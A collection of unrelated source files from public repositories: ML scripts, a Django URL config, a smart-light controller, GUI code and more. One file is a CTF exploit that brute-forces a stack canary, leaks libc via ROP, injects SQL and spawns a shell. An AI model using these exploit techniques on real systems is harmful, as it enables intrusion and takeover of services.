"group:artifact:packaging:version",
Coordinate("group", "artifact", "version", "packaging"),
),
(
"group:artifact:packaging:classifier:version",
Coordinate("group", "artifact", "version", "packaging", "classifier"),
),
),
)
def test_from_coord_str(coord_str: str, expected: Coordinate) -> None:
assert Coordinate.from_coord_str(coord_str) == expected
|
pantsbuild/pants
|
src/python/pants/jvm/resolve/coursier_fetch_test.py
|
coursier_fetch_test.py
|
py
| 4,186 |
python
|
en
|
code
| 2,896 |
github-code
|
6
|
70321394427
|
import multiprocessing as mp
from skopt import Optimizer
from skopt.space import Real, Integer
import subprocess
import time
import pickle
from ID_CNN_V01 import setup_thread_environment
from _utils.ID_utils import get_convolutions, Colors, check_available_gpus
n_calls = 7
dim_learning_rate = Real(low=1e-7, high=3e-2, prior='log-uniform', name='learning_rate')
dim_n_convolutions = Integer(low=1, high=3, name='n_convolutions')
dim_dense_nodes = Integer(low=128, high=200, name='n_dense_nodes')
class ParameterBatch:
"""
Class of Object containing all hyperparameters needed to run the network.
"""
def __init__(self,
learning_rate=0.0005,
input_shape=[480, 640, 1],
batch_size=16,
convolutions=[(64, 7, 7), (128, 5, 5)],
gpu_id=2,
n_dense_nodes=128,
n_max_epochs=30,
n_runs=1,
training=True,
train_csv_file="_data/hetzell_shearlet_training_data.csv",
eval_csv_file="_data/hetzell_shearlet_evaluation_data.csv",
test_csv_file="_data/hetzell_shearlet_testing_data.csv"
):
self.learning_rate = learning_rate
self.input_shape = input_shape
self.batch_size = batch_size
self.convolutions = convolutions
self.gpu_id = gpu_id
self.n_dense_nodes = n_dense_nodes
self.n_max_epochs = n_max_epochs
self.n_runs = n_runs
self.training = training
self.train_csv_file = train_csv_file
self.test_csv_file = test_csv_file
self.eval_csv_file = eval_csv_file
def map_val_to_param_batch(vals, gpu_id):
"""
Maps the values given by an Optimizer into a ParameterBatch object.
:param vals: list of values from Optimizer
:param gpu_id: the gpu_id passed to the ParameterBatch
:return: ParameterBatch object
"""
params = ParameterBatch(learning_rate=vals[0],
convolutions=get_convolutions(vals[1]),
n_dense_nodes=vals[2],
gpu_id=gpu_id)
return params
def bayesian_optimize(n_calls=12):
"""
Apply bayesian optimization to a network. Access global variable reserved_gpus, Ask Optimizer for one point for each GPU,
train and evaluate at that point in parallellized threads, repeat n_calls times. Then train and test the best setup.
:return: ---
"""
start_time = time.time()
p = mp.Pool(len(reserved_gpus))
optimizer = Optimizer(dimensions=[dim_learning_rate, dim_n_convolutions, dim_dense_nodes],
random_state=1)
for i in range(1, n_calls + 1):
gpus = list(reserved_gpus)
vals = optimizer.ask(n_points=len(reserved_gpus))
points = []
for point in vals:
param_batch = map_val_to_param_batch(point, gpus.pop(0))
points.append(param_batch)
loss = p.map(setup_thread_environment, points)
optimizer.tell(vals, loss)
print("#" * 100)
print(Colors.OKBLUE, "Optimization cylce", i, "done.", Colors.ENDC)
print("#" * 100)
print("Best setup found:")
p.close()
print(min(optimizer.yi)) # print the best objective found
sorted_sets = sorted(list(zip(optimizer.yi, optimizer.Xi)), key=lambda tup: tup[0])
print("BEST SET:", sorted_sets[0])
print("#" * 100)
print(Colors.OKBLUE, "Starting Testing of Best Set.", Colors.ENDC)
print("#" * 100)
gpus = list(reserved_gpus)
test_args = map_val_to_param_batch(sorted_sets[0][1], gpus.pop(0))
test_args.training = False
avg_test_accuracy = setup_thread_environment(test_args)
print("Test accuracy:", avg_test_accuracy)
end_time = time.time()
print("It took:", str(end_time - start_time), "seconds")
pickle.dump(sorted_sets, open("_logs/optimizer_points.pkl", "wb"))
try:
file_path = "_logs/dl_optimizer_result.txt"
label_file = open(file_path, "w")
label_file.write("Best setup found:\n")
label_file.write(str(sorted_sets[0]))
label_file.write("\nTime to process: ")
label_file.write(str(end_time - start_time))
label_file.write("\nTest Accuracy: ")
label_file.write(str(avg_test_accuracy))
finally:
label_file.close()
def main():
"""
clears the logdir, finds the reserved_gpus and starts the bayesian optimization.
:return: ---
"""
global reserved_gpus
command_str = "(rm -r _logs)"
subprocess.run(command_str, shell=True)
reserved_gpus = check_available_gpus()
print("GPUs", reserved_gpus, "are available.")
bayesian_optimize(n_calls=n_calls)
if __name__ == "__main__":
main()
|
lorenz-h/DataRepresentationLearning
|
Old Experiments/ImitationDuckie_V1/_old_versions/ID_Optimizer.py
|
ID_Optimizer.py
|
py
| 4,792 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22176331977
|
import networkx as nx
from networkx.algorithms import community
from nltk.corpus import stopwords
import re
def build_graph(text):
word_list = []
G = nx.Graph()
for line in text:
line = (line.strip()).split()
for i, word in enumerate(line):
if i != len(line)-1:
word_a = word
word_b = line[i+1]
if word_a not in word_list:
word_list.append(word_a)
if word_b not in word_list:
word_list.append(word_b)
if G.has_edge(word_a,word_b):
G[word_a][word_b]['weight'] += 1
else:
G.add_edge(word_a,word_b, weight = 1)
return G
def calculate_central_nodes(text_network):
bc = (nx.betweenness_centrality(text_network,weight='weight'))
nx.set_node_attributes(text_network, bc, 'betweenness')
bc_threshold = sorted(bc.values(), reverse=True)[20]
to_keep = [n for n in bc if bc[n] > bc_threshold]
filtered_network = text_network.subgraph(to_keep)
return filtered_network
def create_and_assign_communities(text_network):
communities_generator = community.girvan_newman(text_network)
top_level_communities = next(communities_generator)
next_level_communities = next(communities_generator)
return next_level_communities
def find_topics(text):
try:
text_network = build_graph(text)
text_network = calculate_central_nodes(text_network)
topics = create_and_assign_communities(text_network)
return topics
except:
print("Error: Something went wrong. Check your input. You need at least 20 unique words in your text to start the analysis.")
def clean(text):
new_text = []
no_punct = [re.sub(r'[^\w\s]','',x) for x in text]
stop_words = set(stopwords.words('english'))
for line in no_punct:
new_line = ([item.lower() for item in line.split() if not item.lower() in stop_words])
new_text.append(' '.join((new_line)))
return new_text
|
michal-pikusa/topic-network
|
topicnetwork/__init__.py
|
__init__.py
|
py
| 2,066 |
python
|
en
|
code
| 1 |
github-code
|
6
|
70820187389
|
from lifxlan import *
import subprocess
import random
lights_name = {
"lit" : "Lit_haut",
"couloir" : "Couloir",
"wc" : "Wc",
"cuisine" : "Cuisine"
}
colors = {
"rouge" : [65535, 65535, 65535, 3500],
"orange" : [5525, 65535, 65535, 3500],
"jaune" : [7000, 65535, 65535, 3500],
"vert" : [16173, 65535, 65535, 3500],
"cyan" : [29814, 65535, 65535, 3500],
"bleu" : [43634, 65535, 65535, 3500],
"violet" : [50486, 65535, 65535, 3500],
"rose" : [58275, 65535, 47142, 3500],
"blanc" : [58275, 0, 65535, 5500],
"blanc froid" : [58275, 0, 65535, 9000],
"blanc chaud" : [58275, 0, 65535, 3200],
"or" : [58275, 0, 65535, 2500],
"aleatoire" : 1
}
light=None
power_level=None
color=None
lan = LifxLAN(None)
_lights = lan.get_lights()
lights = {}
for l in _lights:
lights[l.get_label()] = l
def command(light, color, power_level):
if color is not None and power_level is not None:
color = set_power(color, power_level)
if light is not None:
if color is None and power_level is not None:
color = set_power(light.get_color(), power_level)
elif color is not None and power_level is None:
color = set_power(color, light.get_power())
elif color is None and power_level is None:
color = set_power(None, 100)
light.set_color(color, duration=0.2, rapid=False)
def set_power(color, power_level):
if color == None:
color = [58275, 0, 0, 9000]
if type(color) is not list:
color = list(color)
if power_level <= 100:
color[2] = 65535 * power_level / 100
else:
color[2] = power_level
return color
def jarvis_say(rules):
color = None
says = "J\'allume la lumiere "
if "light" in rules:
says += " de la %s " % rules["light"]
if "color" in rules:
if rules["color"] == "aleatoire":
color = colors.keys()[random.randint(0, len(colors) - 1)]
says += " avec une couleur aleatoire qui sera %s" % color
color = colors[color]
else:
says += " en %s " % rules["color"]
if "power" in rules:
if rules["power"] == "0":
says = says.replace("J\'allume", "J\'eteint")
lan.set_power_all_lights("off", rapid=True)
else:
lan.set_power_all_lights("on", rapid=True)
says += " avec une intensite de %s pourcents" % rules["power"]
p = subprocess.Popen(['/etc/script/jarvis/jarvis.sh', '-s', says], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
return color
def parse_arg(args):
light = None
color = None
power_level = None
rules = {}
for i, arg in enumerate(args):
if i + 1 < len(args) and arg + " " + args[i + 1] in lights_name:
light = lights[arg + " " + args[i + 1]]
rules["light"] = arg + " " + args[i + 1]
elif arg in lights_name:
rules["light"] = arg
light = lights[lights_name[arg]]
elif i + 1 < len(args) and arg + " " + args[i + 1] in colors:
rules["color"] = arg + " " + args[i + 1]
color = colors[arg + " " + args[i + 1]]
elif arg in colors:
rules["color"] = arg
color = colors[arg]
else:
try:
power_level = int(arg)
rules["power"] = arg
except:
pass
tmp = jarvis_say(rules)
if tmp != None:
color = tmp
return light, color, power_level
light, color, power_level = parse_arg(sys.argv)
if light is not None:
command(light, color, power_level)
else:
for light_name in lights:
command(lights[light_name], color, power_level)
|
devauxa/harriette
|
script/light.py
|
light.py
|
py
| 3,774 |
python
|
en
|
code
| 0 |
github-code
|
6
|
42162211409
|
"""tilltheend URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from forever import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('login', views.login_request, name='login'),
path('logout', views.logout_request, name='logout'),
path('register', views.register, name='register'),
path('', views.index, name='home'),
path('todo', views.todoadd, name='todo'),
path('translate', views.translate, name='translate'),
path('texttospech', views.texttospech, name='texttospech'),
path('qrcode', views.qrcode, name='qrcode'),
path('weather', views.weather, name='weather'),
path('download', views.download_video, name='download'),
path('delete/<int:id>', views.delete, name='delete'),
path('doing/<int:id>', views.doing, name='doing'),
path('finish/<int:id>', views.finish, name='finish'),
path('history/<int:id>', views.history, name='history'),
path('news', views.news, name='news'),
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
king9799/7-1-projects
|
forever/urls.py
|
urls.py
|
py
| 1,695 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32284951119
|
#!/usr/bin/env python
from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py
bin_file = './streaming'
context(os = 'linux', arch = 'amd64')
# context.log_level = 'debug'
#==========
env = Environment('debug', 'local', 'remote')
env.set_item('mode', debug = 'DEBUG', local = 'PROC', remote = 'SOCKET')
env.set_item('target', debug = {'argv':[bin_file], 'aslr':False}, \
local = {'argv':[bin_file]}, \
remote = {'host':'localhost', 'port':8000})
env.select('remote')
#==========
binf = ELF(bin_file)
addr_send_message = binf.sep_function['send_message']
addr_csu_init = binf.sep_function['__libc_csu_init']
addr_got_main = binf.got['__libc_start_main']
addr_got_read = binf.got['read']
addr_got_write = binf.got['write']
addr_bss = binf.sep_section['.bss']
addr_csu_init_1st = addr_csu_init + 0x5a
addr_csu_init_2nd = addr_csu_init + 0x40
addr_buf = addr_bss + 0x900
addr_buf2 = addr_bss + 0xe00
libc = binf.libc
offset_libc_main = libc.sep_function['__libc_start_main']
path = './music/'
name = 'a'
offset = 0x1b8
#==========
def attack(conn):
canary = 0x44288b3fb3615500
#canary = detect_canary(env)
info('canary = 0x{:08x}'.format(canary))
put_mulmusic(canary)
libc.address = detect_libc_base(conn)
addr_libc_str_sh = libc.search('/bin/sh').next()
info('addr_libc_base = 0x{:08x}'.format(libc.address))
shell = raw_input('shell?(Y/n)')[0] != 'n'
rop = ROP(libc)
if shell:
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.dup2(4, 2)
rop.system(addr_libc_str_sh)
#rop.execve(addr_libc_str_sh, 0, 0)
else:
message = '192.168.115.1'.ljust(0x10, '\x00')
message += 'test\x00'
rop.read(4, addr_buf2, len(message))
for i in range(0x10):
rop.call(addr_send_message, [addr_buf2, 4296, addr_buf2+0x10])
exploit = p64(0xdeadbeef)
exploit += str(rop)
conn.send(exploit)
if not shell:
sleep(0.1)
conn.send(message)
def put_mulmusic(canary):
rop = ROP(binf)
exploit = 'a'*offset
exploit += p64(canary)
exploit += '\x00'*0x10
exploit += p64(0xdeadbeef)
exploit += p64(addr_csu_init_1st)
exploit += p64(0) # rbx
exploit += p64(1) # rbp
exploit += p64(addr_got_write) # r12
exploit += p64(8) # r13
exploit += p64(addr_got_main) # r14
exploit += p64(4) # r15
exploit += p64(addr_csu_init_2nd)
exploit += p64(0xdeadbeef)
exploit += p64(0) # rbx
exploit += p64(1) # rbp
exploit += p64(addr_got_read) # r12
exploit += p64(0x10000) # r13
exploit += p64(addr_buf) # r14
exploit += p64(4) # r15
exploit += p64(addr_csu_init_2nd)
exploit += p64(0xdeadbeef)
exploit += p64(0) # rbx
exploit += p64(addr_buf) # rbp
exploit += p64(0) # r12
exploit += p64(0) # r13
exploit += p64(0) # r14
exploit += p64(4) # r15
exploit += p64(rop.leave.address)
upload_file(name, exploit)
def detect_libc_base(conn):
conn.send('\x80')
conn.sendafter('\x10'+p32(0x24), ("' union select '%s', 16#" % path+name).ljust(36))
conn.sendafter('\x11'+p32(0x40), ''.ljust(64))
conn.sendafter('\x20'+p32(0), '\x84')
conn.sendafter('\x14'+p32(8), p64(0x3ff))
addr_libc_main = u64(conn.recv(8))
addr_libc_base = addr_libc_main - offset_libc_main
return addr_libc_base
def detect_canary(env):
log = context.log_level
context.log_level = 100
canary = '\x00'
while len(canary) < 8:
exploit = 'a'*offset
exploit += ''.join([canary+chr(i) for i in range(0x100)])
upload_file(name, exploit)
for i in range(0, 0x100):
conn = communicate(env.mode, **env.target)
conn.send('\x80')
conn.sendafter('\x10'+p32(0x24), ("' union select '%s', 16#" % path+name).ljust(36))
conn.sendafter('\x11'+p32(0x40), ''.ljust(64))
conn.sendafter('\x20'+p32(0), '\x83')
conn.sendafter('\x13'+p32(8), p64((len(canary)+1)*i))
conn.sendafter('\x23', '\x84')
conn.sendafter('\x14'+p32(8), p64(offset+len(canary)+1))
try:
conn.recv()
except:
found = False
else:
found = True
finally:
conn.close()
if found :
context.log_level = log
info('canary found : 0x%02x' % i)
context.log_level = 100
canary += chr(i)
break
context.log_level = log
return u64(canary)
def upload_file(name, data):
open(path+name, "wb").write(data)
#=========
if __name__=='__main__':
conn = communicate(env.mode, **env.target)
attack(conn)
conn.interactive()
#==========
|
shift-crops/CTFProblemArchive
|
2017/SECCON Finals/Domestic/fuchu/streaming/exploit.py
|
exploit.py
|
py
| 5,229 |
python
|
en
|
code
| 1 |
github-code
|
6
|
27099804006
|
from grid_box import GridBox
class PortfolioDialog:
def getInitialFileName(self):
return "portfolio"
def getInitialFolder(self):
return preferences.portfolio_last_opened_dir()
def addFormElements(self, master):
self.description = self.addEntry(master, "Description:", ValidateNotBlank(master), self.config.description)
#Items
label = Label(master, text="Portfolio Items:")
label.grid(row=self.row, sticky=W, column=self.titleColumn, columnspan = 2)
self.row += 1
self.itemsListBoxEntry = self.addListBox(master, "Items ListBox", height = 10)
self.validateItems = ValidatePortfolioItems(master, self.itemsListBoxEntry.listbox)
self.validations.append(self.validateItems)
self.validateItems.messageLabel.grid(row=self.row, sticky=W, column=self.messageColumn)
headers = ["Description","Diameter","HubHeight","RatedPower","CutOutWindSpeed","Datasets"]
self.items_grid_box = GridBox(master, headers)
self.items_grid_box.edit = self.edit_item
if not self.isNew:
for item in self.config.items:
self.items_grid_box.add_item(item)
self.validateItems.validate()
def setConfigValues(self):
self.config.path = self.filePath.get()
self.config.description = self.description.get()
#exclusions
self.config.items = []
for i in range(self.itemsListBoxEntry.listbox.size()):
if i > 0:
values = extractPortfolioItemValuesFromText(self.itemsListBoxEntry.listbox.get(i))
self.config.addItem(description = values[0], \
diameter = values[1], \
hubHeight = values[2], \
ratedPower = values[3], \
cutOutWindSpeed = values[4], \
datasets = values[5])
def new_item(self):
PortfolioItemDialog(self, configuration.RelativePath(self.filePath.get()), self.status, self.addPortfolioItemFromText)
self.validateItems.validate()
def edit_item(self, event = None):
items = self.itemsListBoxEntry.listbox.curselection()
if len(items) == 1:
idx = int(items[0])
if idx > 0:
text = self.itemsListBoxEntry.listbox.get(items[0])
try:
PortfolioItemDialog(self, configuration.RelativePath(self.filePath.get()), self.status, self.addPortfolioItemFromText, text, idx)
except ExceptionType as e:
self.status.addMessage("ERROR loading config (%s): %s" % (text, e))
def remove_item(self):
items = self.itemsListBoxEntry.listbox.curselection()
pos = 0
for i in items:
idx = int(i) - pos
if idx > 0:
self.itemsListBoxEntry.listbox.delete(idx, idx)
pos += 1
self.validateItems.validate()
def addPortfolioItemFromText(self, text, index = None):
if index != None:
self.itemsListBoxEntry.listbox.delete(index, index)
self.itemsListBoxEntry.listbox.insert(index, text)
else:
self.itemsListBoxEntry.listbox.insert(END, text)
class PortfolioItemDialog(BaseDialog):
def __init__(self, master, relativePath, status, callback, text = None, index = None):
self.relativePath = relativePath
self.callback = callback
self.text = text
self.index = index
self.callback = callback
self.isNew = (text == None)
BaseDialog.__init__(self, master, status)
def body(self, master):
self.prepareColumns(master)
#dummy label to force width
Label(master, text=" " * 275).grid(row = self.row, sticky=W, column=self.titleColumn, columnspan = 8)
self.row += 1
if not self.isNew:
items = extractPortfolioItemValuesFromText(self.text)
description = items[0]
diameter = items[1]
hubHeight = items[2]
ratedPower = items[3]
cutOutWindSpeed = items[4]
datasets = items[5]
else:
description = None
diameter = None
hubHeight = None
ratedPower = None
cutOutWindSpeed = None
datasets = None
self.addTitleRow(master, "Portfolio Item Settings:")
self.description = self.addEntry(master, "Description:", ValidateNotBlank(master), description)
self.diameter = self.addEntry(master, "Diameter:", ValidateNonNegativeFloat(master), diameter)
self.hubHeight = self.addEntry(master, "Hub Height:", ValidateNonNegativeFloat(master), hubHeight)
self.ratedPower = self.addEntry(master, "Rated Power:", ValidateNonNegativeFloat(master), ratedPower)
self.cutOutWindSpeed = self.addEntry(master, "Cut Out Wind Speed:", ValidateNonNegativeFloat(master), cutOutWindSpeed)
self.datasetsListBoxEntry = self.addListBox(master, "Datasets ListBox")
if not self.isNew:
for dataset in datasets:
self.datasetsListBoxEntry.listbox.insert(END, dataset)
self.datasetsListBoxEntry.listbox.grid(row=self.row, sticky=W+E+N+S, column=self.labelColumn, columnspan=2)
self.validateDatasets = ValidateDatasets(master, self.datasetsListBoxEntry.listbox)
self.validations.append(self.validateDatasets)
self.validateDatasets.messageLabel.grid(row=self.row, sticky=W, column=self.messageColumn)
self.newDatasetButton = Button(master, text="New", command = self.NewDataset, width=5, height=1)
self.newDatasetButton.grid(row=self.row, sticky=E+N, column=self.secondButtonColumn)
self.editDatasetButton = Button(master, text="Edit", command = self.EditDataset, width=5, height=1)
self.datasetsListBoxEntry.listbox.bind("<Double-Button-1>", self.EditDataset)
self.editDatasetButton.grid(row=self.row, sticky=E+S, column=self.secondButtonColumn)
self.addDatasetButton = Button(master, text="+", command = self.addDataset, width=2, height=1)
self.addDatasetButton.grid(row=self.row, sticky=E+N, column=self.buttonColumn)
self.removeDatasetButton = Button(master, text="-", command = self.removeDatasets, width=2, height=1)
self.removeDatasetButton.grid(row=self.row, sticky=E+S, column=self.buttonColumn)
#dummy label to indent controls
Label(master, text=" " * 5).grid(row = (self.row-1), sticky=W, column=self.titleColumn)
def apply(self):
datasets = []
for i in range(self.datasetsListBoxEntry.listbox.size()):
dataset = self.relativePath.convertToRelativePath(self.datasetsListBoxEntry.listbox.get(i))
datasets.append(dataset)
self.text = encodePortfolioItemValuesAsText(self.description.get().strip(), \
self.diameter.get(), \
self.hubHeight.get(), \
self.ratedPower.get(), \
self.cutOutWindSpeed.get(), \
datasets)
if self.isNew:
self.status.addMessage("Portfolio Item created")
else:
self.status.addMessage("Portfolio Item updated")
if self.index== None:
self.callback(self.text)
else:
self.callback(self.text, self.index)
def EditDataset(self, event = None):
items = self.datasetsListBoxEntry.listbox.curselection()
if len(items) == 1:
index = items[0]
path = self.datasetsListBoxEntry.listbox.get(index)
try:
datasetConfig = configuration.DatasetConfiguration(self.relativePath.convertToAbsolutePath(path))
DatasetConfigurationDialog(self, self.status, self.addDatasetFromPath, datasetConfig, index)
except ExceptionType as e:
self.status.addMessage("ERROR loading config (%s): %s" % (path, e))
def NewDataset(self):
try:
config = configuration.DatasetConfiguration()
DatasetConfigurationDialog(self, self.status, self.addDatasetFromPath, config)
except ExceptionType as e:
self.status.addMessage("ERROR creating dataset config: %s" % e)
def addDataset(self):
fileName = askopenfilename(parent=self.master, initialdir=preferences.dataset_last_opened_dir(), defaultextension=".xml")
if len(fileName) > 0: self.addDatasetFromPath(fileName)
def addDatasetFromPath(self, path, index = None):
try:
preferences.datasetLastOpened = path
preferences.save()
except ExceptionType as e:
self.addMessage("Cannot save preferences: %s" % e)
path = self.relativePath.convertToRelativePath(path)
if index != None:
self.datasetsListBoxEntry.listbox.delete(index, index)
self.datasetsListBoxEntry.listbox.insert(index, path)
else:
self.datasetsListBoxEntry.listbox.insert(END, path)
self.validateDatasets.validate()
def removeDatasets(self):
items = self.datasetsListBoxEntry.listbox.curselection()
pos = 0
for i in items:
idx = int(i) - pos
self.datasetsListBoxEntry.listbox.delete(idx, idx)
pos += 1
self.validateDatasets.validate()
if __name__ == "__main__":
dialog = PortfolioDialog(self.root, WindowStatus(self), self.LoadPortfolioFromPath, portfolioConfiguration)
|
PCWG/PCWG
|
test-gui/gui/pcwg_ui/portfolio.py
|
portfolio.py
|
py
| 10,704 |
python
|
en
|
code
| 23 |
github-code
|
6
|
32644493827
|
import pymel.core as pm
from mgear.core import attribute
class customShifterMainStep(object):
'''
Main Class for shifter custom steps
'''
def __init__(self, stored_dict):
"""Constructor
"""
self._step_dict = stored_dict
@property
def mgear_run(self):
"""Returns the resulting object of the 'mgearRun' step.
"""
if "mgearRun" not in self._step_dict:
raise Exception(
"Can't access the 'mgearRun' in pre steps \
or when running individual steps.")
return self._step_dict.get('mgearRun')
def component(self, name):
"""Access to components from the current build process.
Args:
name (str): The name of the component
Returns:
Component: The matching Component object
"""
if name not in self.mgear_run.components:
raise KeyError("Could not find the '{}' component.".format(name))
return self.mgear_run.components[name]
def custom_step(self, name):
"""Allows access to custom steps that have already ran in the past.
Args:
name (str): The name of the custom step
Returns:
customShifterMainStep: The matching customShifterMainStep object
"""
if name not in self._step_dict:
raise KeyError(
"The custom step '{}' does not exist, or \
did not run yet.".format(name))
return self._step_dict[name]
def setup(self):
"""This function mus be re implemented for each custom step.
Raises:
Exception: Description
"""
raise NotImplemented("'setup' must be implemented")
def run(self):
"""This function mus be re implemented for each custom step.
Raises:
Exception: Description
"""
raise NotImplemented("'run' must be implemented")
def dup(self, source, name=None):
"""Duplicate the source object and rename it
Args:
source (PyNode): The Source object to duplicate
name (None, string): The name for the new object. If the value
is None the name will be set by using the custom step name
Returns:
PyNode: The new duplicated object.
"""
dup = pm.duplicate(source)[0]
dup.visibility.set(True)
attribute.unlockAttribute(dup)
if name:
pm.rename(dup, name)
else:
pm.rename(dup, "_".join([source.name(), self.name, "setup"]))
pm.parent(dup, self.setup_root)
return dup
|
mgear-dev/mgear4
|
release/scripts/mgear/shifter/custom_step.py
|
custom_step.py
|
py
| 2,657 |
python
|
en
|
code
| 209 |
github-code
|
6
|
27551842247
|
#K-Nearesst Neighbour
#importing the Librares
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
#set the index value as index_col 0
data=pd.read_csv('./Dataset/Classified Data',index_col=0)
#standardize the values
from sklearn.preprocessing import StandardScaler
#Create a object for StandardScaler
scaler=StandardScaler()
#fit and tranform the value to the standard values
scaler.fit(data.drop('TARGET CLASS',axis=1))
scaled_features=scaler.transform(data.drop('TARGET CLASS',axis=1))
#This scaled data doesn't have index name and column name
#store the scaled feature in a dataset
#columns will fil the columns index
#and also neglecting the target class because that is
#independent feature
df_feat=pd.DataFrame(scaled_features,columns=data.columns[:-1])
#sns.pairplot(data,hue='TARGET CLASS')
#Separate the train and test data
from sklearn.model_selection import train_test_split
#first is independent feature ->input dependent feature -> output
x_train,x_test,y_train,y_test=train_test_split(scaled_features,data['TARGET CLASS'])
#k_nearest Neighbour
from sklearn.neighbors import KNeighborsClassifier
#Giving K=1
knn = KNeighborsClassifier(n_neighbors=1)
knn.fit(x_train,y_train)
pred=knn.predict(x_test)
#use the confusion matrix to get the what are the values correctly perdicted
#and unpredicted
from sklearn.metrics import classification_report,confusion_matrix
#here you can see which are all the values g
print(confusion_matrix(pred,y_test))
#Give reports accuracy and other scores
print(classification_report(pred,y_test))
#Run the error rate find the point falls below and predict the K value
error_rate=[]
for i in range(1,40):
knn=KNeighborsClassifier(n_neighbors=i)
knn.fit(x_train,y_train)
pred=knn.predict(x_test)
error_rate.append(np.mean(pred!=y_test))
#plot the error rate vs K values for the error rate calculated
plt.figure(figsize=(10,6))
plt.plot(range(1,40),error_rate,linestyle="dashed",marker="o",markersize=10,
markerfacecolor="red")
plt.title("Error Rate Graph")
plt.xlabel("K-value")
plt.ylabel("Error_Rate")
#here you can see that after k=24 it never touches back so choose that value
knn=KNeighborsClassifier(n_neighbors=24)
knn.fit(x_train,y_train)
pred=knn.predict(x_test)
#Confusion Matric
print(confusion_matrix(y_test,pred))
#classification report
print(classification_report(y_test,pred))
#You can see that accuracy has increased
|
kamarajanis/Machine-Learning
|
K_Nearest_Neighbor/k-nearest.py
|
k-nearest.py
|
py
| 2,535 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21835433544
|
"""Labels app urls"""
from django.urls import path
from task_manager.labels.views import (
LabelsView,
LabelUpdateView,
LabelCreateView,
LabelDeleteView,
)
app_name = 'labels'
urlpatterns = [
path('', LabelsView.as_view(), name='index'),
path('<int:pk>/update/', LabelUpdateView.as_view(), name='upd_label'),
path('<int:pk>/delete/', LabelDeleteView.as_view(), name='del_label'),
path('create/', LabelCreateView.as_view(), name='create'),
]
|
GunGalla/python-project-52
|
task_manager/labels/urls.py
|
urls.py
|
py
| 476 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20844849225
|
import tensorflow.compat.v1 as tf
"""
`image` is assumed to be a float tensor with shape [height, width, 3].
It is a RGB image with pixel values in the range [0, 1].
"""
def random_color_manipulations(image, probability=0.5, grayscale_probability=0.1):
"""
This function randomly changes color of an image.
It is taken from here:
https://cloud.google.com/tpu/docs/inception-v3-advanced
"""
def manipulate(image):
br_delta = tf.random_uniform([], -32.0/255.0, 32.0/255.0)
cb_factor = tf.random_uniform([], -0.1, 0.1)
cr_factor = tf.random_uniform([], -0.1, 0.1)
red_offset = 1.402 * cr_factor + br_delta
green_offset = -0.344136 * cb_factor - 0.714136 * cr_factor + br_delta
blue_offset = 1.772 * cb_factor + br_delta
channels = tf.split(axis=2, num_or_size_splits=3, value=image)
channels[0] += red_offset
channels[1] += green_offset
channels[2] += blue_offset
image = tf.concat(axis=2, values=channels)
image = tf.clip_by_value(image, 0.0, 1.0)
return image
def to_grayscale(image):
image = tf.image.rgb_to_grayscale(image)
image = tf.image.grayscale_to_rgb(image)
return image
do_it = tf.less(tf.random_uniform([]), probability)
image = tf.cond(do_it, lambda: manipulate(image), lambda: image)
do_it = tf.less(tf.random_uniform([]), grayscale_probability)
image = tf.cond(do_it, lambda: to_grayscale(image), lambda: image)
return image
def random_pixel_value_scale(image, probability=0.5, minval=0.9, maxval=1.1):
"""
This function scales each pixel
independently of the other ones.
Arguments:
image: a float tensor with shape [height, width, 3],
an image with pixel values varying between zero and one.
probability: a float number.
minval: a float number, lower ratio of scaling pixel values.
maxval: a float number, upper ratio of scaling pixel values.
Returns:
a float tensor with shape [height, width, 3].
"""
def random_value_scale(image):
color_coefficient = tf.random_uniform(
tf.shape(image), minval=minval,
maxval=maxval, dtype=tf.float32
)
image = tf.multiply(image, color_coefficient)
image = tf.clip_by_value(image, 0.0, 1.0)
return image
do_it = tf.less(tf.random_uniform([]), probability)
image = tf.cond(do_it, lambda: random_value_scale(image), lambda: image)
return image
|
TropComplique/MultiPoseNet
|
detector/input_pipeline/color_augmentations.py
|
color_augmentations.py
|
py
| 2,540 |
python
|
en
|
code
| 9 |
github-code
|
6
|
73696099389
|
import os
import subprocess
from datetime import timedelta
from . import dispersion_file_utils as dfu
from .dispersiongrid import BSDispersionGrid, BSDispersionPlot, create_color_plot
class PolygonGenerator(object):
"""Generates polygon kmls from a NETCDF file representing smoke dispersion
time series.
Public Instance Attributes:
output_dir - output directory containing generated polygon kmls,
legend, xsl file, and cutpoints file
legend_filename - legend's file name
kml_files - list of tuples of the form (<kml file name>, <prediction
timestamp>)
"""
# HACK: It would be more elegant to generate xml using an XML package, like minidom.
# We're using raw strings for speed of implementation.
XSL_FIRST_PART = r"""<?xml version="1.0"?>
<!-- This is an xsl stylesheet to add styles to an OGR generated KML file -->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:kml="http://www.opengis.net/kml/2.2" version="1.0">
<xsl:output method="xml" indent="yes" omit-xml-declaration="no" encoding="utf-8"/>
<!-- In general, just pass through all elements and attributes -->
<xsl:template match="*">
<xsl:copy>
<xsl:copy-of select="@*" />
<xsl:apply-templates />
</xsl:copy>
</xsl:template>
<!-- We want to eliminate any embedded style because we don't want to hide the external styles -->
<xsl:template match="kml:Style" />
<!-- Eliminate Schema and ExtendedData -->
<xsl:template match="kml:Schema" />
<xsl:template match="kml:ExtendedData" />
<xsl:template match="kml:Document">
<xsl:copy>
<xsl:copy-of select="@*" />
"""
XSL_STYLE_ELEMENT = """<Style id=\"%s\">
<PolyStyle>
<color>%s</color>
<fill>%s</fill>
<outline>0</outline>
</PolyStyle>
</Style>
"""
